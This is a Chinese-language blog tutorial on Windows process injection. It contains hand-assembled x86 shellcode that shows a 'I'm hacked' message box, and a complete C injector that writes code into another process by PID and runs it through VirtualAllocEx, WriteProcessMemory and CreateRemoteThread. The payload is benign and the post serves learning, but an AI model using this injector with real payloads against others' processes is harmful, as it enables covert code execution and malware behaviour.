進程注入學習

原創 冰封飞飞 2020-02-22 09:45

  這次目標是使用進程注入,將一段shellcode注入到一個進程,然後執行。

主要的思路是1.編寫shellcode,目的是彈出一個對話框 2.在目標進行分配一段空間,並且寫入shellcode,然後使用CreateRemoteThread() API創建一個遠程線程並且執行。

1.shellcode的編寫

shellcode的作用是彈出一個MessageBox,需要的步驟有1.使用LoadLibraryA加載user32.dll 2.使用GetProcAddress獲取MessageBoxA的入口地址。並且調用MessageBoxA。

然而不同系統的LoadLibraryA的地址和GetProcAddress的地址都不同,爲此需要先獲得kernel32.dll的基址,然後減去一個偏移量得到GetProcAddress和LoadLibraryA的地址。

要獲得二進制的shellcode,我先用匯編寫出了代碼,然後通過Ollydbg反彙編將二進制代碼獲得,然後寫入shellcode。

獲取kernel32.dll基址的方式參考了看雪論壇的大大寫的一篇文章http://bbs.pediy.com/showthread.php?t=99007 ,

其中彙編代碼如下

assume fs:nothing
  mov   eax,fs:[30h]
  test  eax,eax
  js  os_9x
os_nt:  
  mov  eax,[eax+0ch]
  mov  esi,[eax+1ch]
  lodsd  
  mov   eax,[eax+8]
  jmp  k_finished
os_9x:
  mov   eax,[eax+34h]
  mov  eax,[eax+7ch]
  mov  eax,[eax+3ch]
k_finished:nothing
最終的kernel32.dll的基址存在了eax寄存器。

通過eax減去偏移量就獲得了  LoadLibraryA和GetprocAddress的地址, 偏移量的獲得方式可以在k_finished後面加上mov dword ptr[addr], eax

假設eax是提前定義的一個unsigned int變量, 然後用addr - (unsigned int)LoadLibraryA獲取出偏移量,同樣的方式可以得到GetProcAddress的偏移量。

 LoadlibraryA的參數字符串user32.dll 以及MessageBoxA字符串和彈出對話框的標題和內容的字符串,我們在棧上分配一個臨時的空間,然後將內容存到棧上面。

部分彙編代碼如下,先分配40個空間,然後將user32.dll的每個字符都mov到這個空間裏面,最後加上/0

sub esp, 40
mov [ebp - 2B], 'u'
mov [ebp - 2A], 's'
mov [ebp - 29], 'e'
mov [ebp - 28], 'r'
mov [ebp - 27], '3'
mov [ebp - 26], '2'
mov [ebp - 25], '.'
mov [ebp - 24], 'd'
mov [ebp - 23], 'l'
mov [ebp - 22], 'l'
mov [ebp - 21], 0x0
使用的時候可以獲取字符串的地址lea eax, [ebp - 2B].

完成了這些準備工作,就可以比較容易的寫出彙編代碼了,下面將完成shellcode和註釋的彙編代碼貼出來。

char code[] = {0x55,//push ebp
0x8B,0xEC,// mov ebp, esp
0x83,0xEC,0x40,//sub esp, 40
0xC6,0x45,0xD5,0x75,//mov [ebp - 2B], 'u'
0xC6,0x45,0xD6,0x73,//s
0xC6,0x45,0xD7,0x65,//e
0xC6,0x45,0xD8,0x72,//r
0xC6,0x45,0xD9,0x33,//3
0xC6,0x45,0xDA,0x32,//2
0xC6,0x45,0xDB,0x2E,//.
0xC6,0x45,0xDC,0x64,//d
0xC6,0x45,0xDD,0x6C,//l
0xC6,0x45,0xDE,0x6C,//l
0xC6,0x45,0xDF,0x00,//0
0xC6,0x45,0xE0,0x4D,//M
0xC6,0x45,0xE1,0x65,//e
0xC6,0x45,0xE2,0x73,//s
0xC6,0x45,0xE3,0x73,//s
0xC6,0x45,0xE4,0x61,//a
0xC6,0x45,0xE5,0x67,//g
0xC6,0x45,0xE6,0x65,//e
0xC6,0x45,0xE7,0x42,//B
0xC6,0x45,0xE8,0x6F,//o
0xC6,0x45,0xE9,0x78,//x
0xC6,0x45,0xEA,0x41,//A
0xC6,0x45,0xEB,0x00,//0
0xC6,0x45,0xEC,0x49,//I
0xC6,0x45,0xED,0x27,//'
0xC6,0x45,0xEE,0x6D,//m
0xC6,0x45,0xEF,0x20,// ' '
0xC6,0x45,0xF0,0x68,//h
0xC6,0x45,0xF1,0x61,//a
0xC6,0x45,0xF2,0x63,//c
0xC6,0x45,0xF3,0x6B,//k
0xC6,0x45,0xF4,0x65,//e
0xC6,0x45,0xF5,0x64,//d
0xC6,0x45,0xF6,0x00,//0
0x64,//fs:
0xA1,0x30,0x00,0x00,0x00,//mov eax, dword ptr fs:[30]
0x85,0xC0,//test eax, eax
0x78,0x0C,//js  os_9x
//os_net:
0x8B,0x40,0x0C,  //mov  eax,[eax+0ch]              
0x8B,0x70,0x1C,//mov  esi,[eax+1ch]
0xAD,//lodsd
0x8B,0x40,0x08,//mov   eax,[eax+8]
0xEB,0x09,// jmp  k_finished
//os_9x:
0x8B,0x40,0x34,//mov   eax,[eax+34h]   
0x8B,0x40,0x7C,//mov  eax,[eax+7ch]
0x8B,0x40,0x3C,//mov  eax,[eax+3ch]
//k_finshed:
0x89,0x45,0xFC,  //mov [ebp - 4], eax
0x8D,0x45,0xD5,// lea  eax, [ebp-0x2B]
0x50,//push eax
0x8B,0x45,0xFC,// mov eax, [ebp - 4] 
0x2D,0x97,0x59,0x2A,0x00,//sub eax, 0x2a5997
0xFF,0xD0,//call eax
0x8D,0x4D,0xE0,// lea ecx, [ebp - 0x20]
0x51,// push ecx
0x50, //push eax
0x8B,0x45,0xFC, //mov eax, [ebp - 4]
0x2D,0xF4,0x67,0x2A,0x00,//sub eax, 0x2a67f4
0xFF,0xD0,//call eax
0x8D,0x4D,0xEC,// lea ecx, [ebp - 0x14]
0x6A,0x00,//push 0
0x51,//push ecx
0x51,//push ecx
0x6A,0x00,//push 0
0xFF,0xD0,// call eax
0x8B,0xE5, //mov esp, ebp
0x5D,//  pop ebp
0xC3,//ret
};

2.注入程序的編寫

注入的步驟分爲

獲取進程的PID,然後通過OpenProcess創建進程的句柄。在進程中分配空間使用VirtualAllocEx,然後返回值是分配內存的地址,通過這個地址使用WriteProcessMemory將shellcode寫入到內存中。然後通過CreateRemoteThread創建一個遠程線程,然後使用WaitForSingleObject等待遠程線程結束。

最後使用VirtualFreeEx,CloseHandle進行清理。

最終代碼爲:

/*
*使用vc2012 express編譯
*/
#include <windows.h>
char code[] = {0x55,//push ebp
0x8B,0xEC,// mov ebp, esp
0x83,0xEC,0x40,//sub esp, 40
0xC6,0x45,0xD5,0x75,//mov [ebp - 2B], 'u'
0xC6,0x45,0xD6,0x73,//s
0xC6,0x45,0xD7,0x65,//e
0xC6,0x45,0xD8,0x72,//r
0xC6,0x45,0xD9,0x33,//3
0xC6,0x45,0xDA,0x32,//2
0xC6,0x45,0xDB,0x2E,//.
0xC6,0x45,0xDC,0x64,//d
0xC6,0x45,0xDD,0x6C,//l
0xC6,0x45,0xDE,0x6C,//l
0xC6,0x45,0xDF,0x00,//0
0xC6,0x45,0xE0,0x4D,//M
0xC6,0x45,0xE1,0x65,//e
0xC6,0x45,0xE2,0x73,//s
0xC6,0x45,0xE3,0x73,//s
0xC6,0x45,0xE4,0x61,//a
0xC6,0x45,0xE5,0x67,//g
0xC6,0x45,0xE6,0x65,//e
0xC6,0x45,0xE7,0x42,//B
0xC6,0x45,0xE8,0x6F,//o
0xC6,0x45,0xE9,0x78,//x
0xC6,0x45,0xEA,0x41,//A
0xC6,0x45,0xEB,0x00,//0
0xC6,0x45,0xEC,0x49,//I
0xC6,0x45,0xED,0x27,//'
0xC6,0x45,0xEE,0x6D,//m
0xC6,0x45,0xEF,0x20,// ' '
0xC6,0x45,0xF0,0x68,//h
0xC6,0x45,0xF1,0x61,//a
0xC6,0x45,0xF2,0x63,//c
0xC6,0x45,0xF3,0x6B,//k
0xC6,0x45,0xF4,0x65,//e
0xC6,0x45,0xF5,0x64,//d
0xC6,0x45,0xF6,0x00,//0
0x64,//fs:
0xA1,0x30,0x00,0x00,0x00,//mov eax, dword ptr fs:[30]
0x85,0xC0,//test eax, eax
0x78,0x0C,//js  os_9x
//os_net:
0x8B,0x40,0x0C,  //mov  eax,[eax+0ch]              
0x8B,0x70,0x1C,//mov  esi,[eax+1ch]
0xAD,//lodsd
0x8B,0x40,0x08,//mov   eax,[eax+8]
0xEB,0x09,// jmp  k_finished
//os_9x:
0x8B,0x40,0x34,//mov   eax,[eax+34h]   
0x8B,0x40,0x7C,//mov  eax,[eax+7ch]
0x8B,0x40,0x3C,//mov  eax,[eax+3ch]
//k_finshed:
0x89,0x45,0xFC,  //mov [ebp - 4], eax
0x8D,0x45,0xD5,// lea  eax, [ebp-0x2B]
0x50,//push eax
0x8B,0x45,0xFC,// mov eax, [ebp - 4] 
0x2D,0x97,0x59,0x2A,0x00,//sub eax, 0x2a5997
0xFF,0xD0,//call eax
0x8D,0x4D,0xE0,// lea ecx, [ebp - 0x20]
0x51,// push ecx
0x50, //push eax
0x8B,0x45,0xFC, //mov eax, [ebp - 4]
0x2D,0xF4,0x67,0x2A,0x00,//sub eax, 0x2a67f4
0xFF,0xD0,//call eax
0x8D,0x4D,0xEC,// lea ecx, [ebp - 0x14]
0x6A,0x00,//push 0
0x51,//push ecx
0x51,//push ecx
0x6A,0x00,//push 0
0xFF,0xD0,// call eax
0x8B,0xE5, //mov esp, ebp
0x5D,//  pop ebp
0xC3,//ret
};


int main(int argc, char *argv[])
{    
        int pid = 0;
        int i = 0;
	HANDLE hproc = 0;
	int ret = 0;
	PBYTE addr;
	HANDLE thread;
	DWORD   dwThreadId = 0;
	unsigned int address = 0;
	int exitCode = 0;
	if (argc < 2) {
		printf("Usage: %s pid\n", argv[0]);
		return -1;
	}
	pid = atoi(argv[1]);
	if (pid <= 0) {
		printf("[E]: pid must be positive (pid>0)!\n");
		return -2;
	}
	
	hproc = OpenProcess(PROCESS_CREATE_THREAD 
        | PROCESS_QUERY_INFORMATION
        | PROCESS_VM_OPERATION 
        | PROCESS_VM_WRITE 
        | PROCESS_VM_READ,
        FALSE, pid);
  addr = (PBYTE)VirtualAllocEx(hproc, 0, sizeof(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);//分配內存,然後起始地址保存在addr
	ret = WriteProcessMemory(hproc, addr, code, sizeof(code), NULL); //將代碼寫入到分配好的內存中。
	if (ret)
	{
		printf("WriteProcessMemory success! addr = %08x\n", addr);
		thread = CreateRemoteThread(hproc, NULL, 0, (LPTHREAD_START_ROUTINE)addr, addr, 0, &dwThreadId);//將寫入好shellcode代碼的內存,建立遠程線程
		if (thread == 0)
		{
			printf("CreateRemoteThread failed %d\n" ,GetLastError());//判斷出錯信息
		}
		else
		{			
			WaitForSingleObject(thread, INFINITE);				
		}
	}
	else
	{
    printf("WriteProcessMemory failed!" );
	}
	
	if(!VirtualFreeEx(hproc, addr,0 , MEM_RELEASE))
  {
    printf("[E]: VirtualMemory  (%08x) cannot be freed !\n", addr);
		//return 2;
  }
	else
	{
    printf("[E]: VirtualMemory  (%08x) is freed !\n", addr);
	}
	if (!CloseHandle(hproc)) 
	{
		printf("[E]: Process (%d) cannot be closed !\n", pid);
		return 2;
	}
	printf("[I]: Process (%d) is closed. \n", pid);
	return 0;
}

通過任務管理器查看到目標進程的PID之後,然後在命令行使用命令行參數inj.exe 8888進行注入(這裏假設次程序的名字爲inj.exe 進程的pid爲8888)。

如果目標進程沒有防禦措施的話,就會創建一個線程然後彈出一個對話框。


冰封飛飛
發佈了67 篇原創文章 · 獲贊 11 · 訪問量 9萬+
私信 關注
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

等保測評--通信網絡安全測評要求

信息安全等級保護,是對信息和信息載體按照重要性等級分級別進行保護的一種工作,在中國、美國等很多國家都存在的一種信息安全領域的工作。在中國,信息安全等級保護廣義上爲涉及到該工作的標準、產品、系統、信息等均依據等級保護思想的安全工作;狹義上一

江南落花雨 2020-07-08 07:12:19

等保測評--物理環境安全測評要求

信息安全等級保護,是對信息和信息載體按照重要性等級分級別進行保護的一種工作,在中國、美國等很多國家都存在的一種信息安全領域的工作。在中國,信息安全等級保護廣義上爲涉及到該工作的標準、產品、系統、信息等均依據等級保護思想的安全工作;狹義上一

江南落花雨 2020-07-08 07:12:19

長度擴展攻擊詳解

這幾天在看密碼學的長度擴展攻擊,看了不少文章,感覺都說得不夠清楚,自己弄清楚之後想寫一篇,做一個記錄。 1. 簡介        長度擴展攻擊(length extension attack),是指針對某些允許包含額外信息的加密散列函數

szuaurora 2020-07-08 06:53:55

關於信息安全專業學習的一些看法

〇、更新 2020.4.13更新: 文章收到很多點贊,受寵若驚。目前在讀研二,根據在實驗室學到的東西我再補充一些內容。 1.現在越發感覺到比賽的重要性,比如你要學好AI,那麼你不能光是學習理論知識,你需要多寫代碼,最好參加比賽,比如參加國

圈亮 2020-07-08 04:27:20

動手實現簡易端口掃描器——PortScanner

文章目錄效果展示前言系列介紹舉例子&打比方何爲端口物理端口虛擬端口TCP&UDP文章介紹設計分析設計實現關於GIL 效果展示 本地服務器狀態圖: 前言 系列介紹 重新翻看了下博客,最近的一篇小工具實現類的文章是一年前寫的(

垃圾管理员 2020-07-08 03:19:04

AVISPA編譯工具SPAN虛擬機的安裝和簡單使用教程

1. 什麼是AVISPA 真是對不起提問的大家了,我好像沒說清楚AVISPA是什麼了。 根據官網的定義來吧: AVISPA stands for Automated Validation of Internet Security

傅小凤- 2020-07-08 00:18:02

Miller-Rabin概率素性檢測算法

最近在寫密碼算法與應用的大作業,看到網上的Miller-Rabin素性檢測算法大多寫得不是很清楚,就想簡單描述下Miller-Rabin素性檢測算法的具體算法內容(下面的算法流程和原理部分均摘自信息安全數學基礎老師的課件)。 原理

傅小凤- 2020-07-08 00:18:01

re學習筆記(67)SCTF-re-signin

考察的是python的exe文件反編譯成py文件這個知識點, 所用工具在我的GitHub:https://github.com/Eliauk55/CTF-tools 先用pyinstxtractor.py得到exe轉pyc文件

我也不知道起什么名字呐 2020-07-07 22:52:30

關於反病毒技術的想法

          數學是解決信息檢索和自然語言處理的最好工具。         同樣的         數學也是解決計算機病毒智能識別的最好工具。

anzijin 2020-07-07 17:53:56

【Robot】 信息安全自學教程彙總 轉自【Eastmount 】

原文鏈接:https://blog.csdn.net/Eastmount/article/details/102816621 這是作者的系列網絡安全自學教程,主要是關於網安工具和實踐操作的在線筆記,特分享出來與博友共勉,希望您們喜歡,一

shengda_mao1118 2020-07-07 12:07:21

記一次推免經歷

今天空間,朋友圈,論壇註定會被各路大佬的推免待錄取刷屏,C9、985、甚至調侃去了中科院這種“雙非”。從9初到今天,我同樣也爲推免忙的焦頭爛額,上午收到了南理工的offer,茶餘飯後,寫下這篇博客,分享給志同道合之人,更多的是寫給自己。

不开心就秒了 2020-07-07 08:33:04

WebGoat實驗-XSS(跨站腳本攻擊)

信安實驗,安排在WebGoat上面的XSS實驗。簡單記錄一下實驗過程。 Stage 1: Stored XSS(存儲XSS攻擊) 實驗內容:主要是用戶“Tom”(攻擊者)在自己的個人資料中添加了惡意代碼(比如最簡單的<script>a

王二牛放小 2020-07-07 05:20:52

信息安全行業入門與各類技術簡介(掃盲貼)

1.簡介 作爲第一篇介紹信息安全的掃盲貼,就說一些乾貨要實際一些,主要介紹一下信息安全行業裏面的一些業務開展情況與常規的一些技術手段與工具,附帶推薦了一些學習的網站與書籍,純手碼字部分描述有失偏頗,歡迎指出斧正。 談到信息安全,都

发型资深Dan 2020-07-07 02:04:47

sysmon日誌輔助工具

文章目錄sysmon介紹sysmon 部署Sysmon ViewSysmon Shellsysmon優秀資源 sysmon介紹 如果是做過應急響應的朋友,對sysmon應該都比較熟悉了,它是一款強大的輕量級監控工具,由Window

Eric.zhong 2020-07-06 22:43:30

JumpServer堡壘機部署與運用之六:Windows部署SSH組件

文章目錄問題描述問題解決參考資料 問題描述 JumpServer會定期對資產列表進行遍歷更新,它會更新主機的資產信息,如CPU、MEM、DISK、操作系統等信息。此功能是基於SSH完成的,因此Linux可以直接獲取到相應的信息,但

Eric.zhong 2020-07-06 22:43:30